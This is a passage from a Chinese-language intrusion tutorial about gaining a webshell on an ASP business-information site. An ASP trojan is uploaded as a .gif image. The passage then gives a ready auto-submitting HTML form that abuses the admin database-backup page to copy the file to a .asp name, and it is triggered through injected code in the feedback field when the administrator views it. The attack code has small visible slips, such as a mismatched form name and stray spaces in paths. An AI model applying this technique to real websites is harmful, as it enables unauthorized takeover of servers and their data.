三、利用跨站来备份,得到WEBSHELL

再来看下这系统数据库备份的主要代码:

代码片段八： <form name="form1" method="POST" action="admin_backdb.asp?action=back"> 数据库路径:<input type="text" name="currf" size="30" value="<%=db%>"> 备份数据目录:<input type="text" name="backf" size="20" value="mdbback"> 数据库名称：<input type="text" name="backfy" size="20" value="back.asp"> <input type="submit" name="Submit" value="备份" > <input type="reset" name="Submit2" value="重置" > </form>

但我们首先要得到备份的路径,在前台”免费发布商机”(由于是测试版,无此上传图片的功能,我就把马放到UserDocument\marcosa\Picture下,不过这个目录下要有写入的权限,命名为20071124100000.gif),上传图片处上传一个以gif后缀的ASP马,这儿得到图片的相对路径为:” UserDocument/marcosa/Picture/20071124100000.gif”如图9:

（图9）

按照上面同样的方法,我们构造一个简单备份表单,代码如下:

代码片段九： <html> <form name="form1" method="post" action="../../admin /system/admin_backdb.asp? action=back"> <input  name="currf" value="../ ../UserDocument/marcosa/Picture/20071124100000.gif"> <input  name="backf"  value="huaxia"> <input  name="backfy"  value="1.asp"> </form>                      <SCRIPT language="JavaScript"> document.form.submit() </SCRIPT> </html>

将以上内容保存为2.htm后上上传到自己的空间,得到的地址为:http://127.0.0.1/2.htm,同样到首页在意见反馈里写入挂马的代码,提交后当管理员进入后台查看反馈信息时,就会自动的帮我们备份,从而让我们得到一个WEBSHELL,如图10，图11，图12:

（图10）

（图11）

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页